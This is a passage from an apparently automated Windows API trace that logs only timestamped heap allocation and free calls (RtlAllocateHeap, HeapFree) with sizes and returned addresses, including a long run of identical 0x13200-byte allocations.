hHeap=0x4a0000) returned 1 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba330 | out: hHeap=0x4a0000) returned 1 [0239.928] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x640) returned 0x4b8910 [0239.928] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1247) returned 0x4ed940 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.928] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x520) returned 0x4b8910 [0239.928] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1b56) returned 0x4b93e0 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.929] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8a0) returned 0x4ed940 [0239.929] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28ed) returned 0x4baf40 [0239.929] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0239.929] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.929] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x550) returned 0x4b8910 [0239.929] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.929] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2537) returned 0x4ed940 [0239.929] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12b7) returned 0x4b93e0 [0239.929] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x950) returned 0x4bd840 [0239.930] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.930] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0239.930] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x3d4f) returned 0x4be1a0 [0239.930] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4baf40 | out: hHeap=0x4a0000) returned 1 [0239.930] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bd840 | out: hHeap=0x4a0000) returned 1 [0239.930] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2377) returned 0x4ed940 [0239.930] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x11d7) returned 0x4c1f00 [0239.931] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8e0) returned 0x4b93e0 [0239.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c1f00 | out: hHeap=0x4a0000) returned 1 [0239.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0239.931] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5b0) returned 0x4b8910 [0239.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.931] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x640) returned 0x4b8910 [0239.931] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5be2) returned 0x4cdb40 [0239.932] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4be1a0 | out: hHeap=0x4a0000) returned 1 [0239.932] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x890) returned 0x4ed940 [0239.932] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xac0) returned 0x4ed940 [0239.932] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab350 [0239.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x960) returned 0x4ed940 [0239.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x960) returned 0x4ee2b0 [0239.932] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x460) returned 0x4b8910 [0239.933] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe0f) returned 0x4eec20 [0239.933] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee2b0 | out: hHeap=0x4a0000) returned 1 [0239.933] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.933] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c17) returned 0x4d3730 [0239.933] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe00) returned 0x4ed940 [0239.933] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x700) returned 0x4d5350 [0239.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0239.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.934] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x153d) returned 0x4d3730 [0239.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eec20 | out: hHeap=0x4a0000) returned 1 [0239.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d5350 | out: hHeap=0x4a0000) returned 1 [0239.934] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2277) returned 0x4ed940 [0239.934] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1157) returned 0x4d4c80 [0239.934] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8a0) returned 0x4d5de0 [0239.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d4c80 | out: hHeap=0x4a0000) returned 1 [0239.935] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1fc7) returned 0x4ed940 [0239.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0239.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d5de0 | out: hHeap=0x4a0000) returned 1 [0239.935] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1657) returned 0x4d3730 [0239.935] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xb20) returned 0x4d4d90 [0239.935] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x590) returned 0x4ef910 [0239.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0239.936] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d4d90 | out: hHeap=0x4a0000) returned 1 [0239.936] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f96) returned 0x4d3730 [0239.936] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.936] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef910 | out: hHeap=0x4a0000) returned 1 [0239.936] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b47) returned 0x4d66d0 [0239.936] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x15b7) returned 0x4ed940 [0239.936] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xad0) returned 0x4eef00 [0239.937] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d66d0 | out: hHeap=0x4a0000) returned 1 [0239.937] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.937] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eef00 | out: hHeap=0x4a0000) returned 1 [0239.937] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2697) returned 0x4d66d0 [0239.937] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1367) returned 0x4ed940 [0239.938] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9a0) returned 0x4eecb0 [0239.938] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d66d0 | out: hHeap=0x4a0000) returned 1 [0239.938] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.938] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x474d) returned 0x4d66d0 [0239.938] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0239.938] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eecb0 | out: hHeap=0x4a0000) returned 1 [0239.938] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x920) returned 0x4ed940 [0239.938] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.938] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1b47) returned 0x4ed940 [0239.938] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xd90) returned 0x4dae30 [0239.938] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6d0) returned 0x4ef490 [0239.939] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.939] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dae30 | out: hHeap=0x4a0000) returned 1 [0239.939] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef490 | out: hHeap=0x4a0000) returned 1 [0239.939] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5d0) returned 0x4b8910 [0239.939] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6adf) returned 0x4b93e0 [0239.939] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d66d0 | out: hHeap=0x4a0000) returned 1 [0239.939] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.939] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1887) returned 0x4ed940 [0239.939] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc30) returned 0x4ef1d0 [0239.939] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x620) returned 0x4b8910 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef1d0 | out: hHeap=0x4a0000) returned 1 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.940] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8f0) returned 0x4ed940 [0239.940] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x480) returned 0x4b8910 [0239.940] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x240) returned 0x4ee240 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee240 | out: hHeap=0x4a0000) returned 1 [0239.940] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4b05e0 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab350 | out: hHeap=0x4a0000) returned 1 [0239.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cdb40 | out: hHeap=0x4a0000) returned 1 [0239.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0239.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b05e0 | out: hHeap=0x4a0000) returned 1 [0239.941] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9900) returned 0x4b93e0 [0239.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1bf0) returned 0x4ed940 [0240.171] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0240.171] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9937) returned 0x4cdb40 [0240.172] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0240.172] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab350 [0240.172] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9900) returned 0x4b93e0 [0240.173] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1bf0) returned 0x4ed940 [0240.173] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0240.173] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9937) returned 0x4ed940 [0240.174] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0240.175] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4b0a90 [0240.175] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab350 | out: hHeap=0x4a0000) returned 1 [0240.175] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c3790 | out: hHeap=0x4a0000) returned 1 [0240.176] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda40 | out: hHeap=0x4a0000) returned 1 [0240.176] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0270 | out: hHeap=0x4a0000) returned 1 [0240.176] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x4b93e0 [0240.177] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x4d7480 [0240.177] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4a8d40 [0240.177] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x4f7280 [0240.178] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9380 [0240.178] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d40 | out: hHeap=0x4a0000) returned 1 [0240.178] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x50a490 [0240.178] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9140 [0240.178] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9380 | out: hHeap=0x4a0000) returned 1 [0240.178] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x51d6a0 [0240.179] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab350 [0240.179] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9140 | out: hHeap=0x4a0000) returned 1 [0240.179] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x5308b0 [0240.180] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x30) returned 0x4b8690 [0240.180] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab350 | out: hHeap=0x4a0000) returned 1 [0240.180] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x543ac0 [0240.180] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x556cd0 [0240.181] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x48) returned 0x4b00e0 [0240.181] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8690 | out: hHeap=0x4a0000) returned 1 [0240.181] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x569ee0 [0240.182] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x57d0f0 [0240.182] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f40080 [0240.183] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x68) returned 0x4a8d40 [0240.183] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b00e0 | out: hHeap=0x4a0000) returned 1 [0240.183] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f53290 [0240.184] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f664a0 [0240.184] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f796b0 [0240.185] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f8c8c0 [0240.185] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x98) returned 0x4a50b0 [0240.185] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d40 | out: hHeap=0x4a0000) returned 1 [0240.185] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f9fad0 [0240.186] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1fb2ce0 [0240.186] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1fc5ef0 [0240.187] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1fd9100 [0240.187] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1fec310 [0240.188] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1fff520 [0240.189] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe0) returned 0x4a4ce0 [0240.189] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a50b0 | out: hHeap=0x4a0000) returned 1 [0240.189] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2012730 [0240.189] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2040080 [0240.190] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2053290 [0240.191] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20664a0 [0240.191] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20796b0 [0240.192] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x208c8c0 [0240.192] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x209fad0 [0240.193] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20b2ce0 [0240.194] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20c5ef0 [0240.194] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x150) returned 0x4ab0b0 [0240.194] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a4ce0 | out: hHeap=0x4a0000) returned 1 [0240.194] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20d9100 [0240.195] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20ec310 [0240.195] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20ff520 [0240.195] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2112730 [0240.196] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2125940 [0240.197] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2138b50 [0240.197] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x214bd60 [0240.198] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x215ef70 [0240.198] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2172180 [0240.199] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2185390 [0240.200] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21985a0 [0240.200] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21ab7b0 [0240.201] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21be9c0 [0240.202] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21d1bd0 [0240.202] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1f8) returned 0x4b8910 [0240.202] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab0b0 | out: hHeap=0x4a0000) returned 1 [0240.202] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21e4de0 [0240.202] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21f7ff0 [0240.203] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x220b200 [0240.204] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x221e410 [0240.204] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2240080 [0240.558] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2253290 [0240.559] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22664a0 [0240.559] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22796b0 [0240.560] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x228c8c0 [0240.560] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x229fad0 [0240.561] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22b2ce0 [0240.562] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22c5ef0 [0240.562] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22d9100 [0240.563] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22ec310 [0240.563] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22ff520 [0240.563] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2312730 [0240.564] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2325940 [0240.565] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2338b50 [0240.565] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x234bd60 [0240.566] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x235ef70 [0240.566] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2372180 [0240.567] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f0) returned 0x4b8b10 [0240.567] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0240.567] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2385390 [0240.567] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23985a0 [0240.568] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23ab7b0 [0240.568] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23be9c0 [0240.569] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23d1bd0 [0240.569] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23e4de0 [0240.569] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23f7ff0 [0240.570] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x240b200 [0240.571] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x241e410 [0240.571] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2431620 [0240.572] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2444830 [0240.573] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2457a40 [0240.573] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x246ac50 [0240.574] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x247de60 [0240.574] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2491070 [0240.577] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24a4280 [0240.578] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24b7490 [0240.579] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24ca6a0 [0240.579] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24dd8b0 [0240.580] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24f0ac0 [0240.580] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2503cd0 [0240.581] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2516ee0 [0240.582] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x252a0f0 [0240.582] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x253d300 [0240.583] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2550510 [0240.583] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2563720 [0240.584] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2576930 [0240.584] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2589b40 [0240.584] RtlAllocateHeap 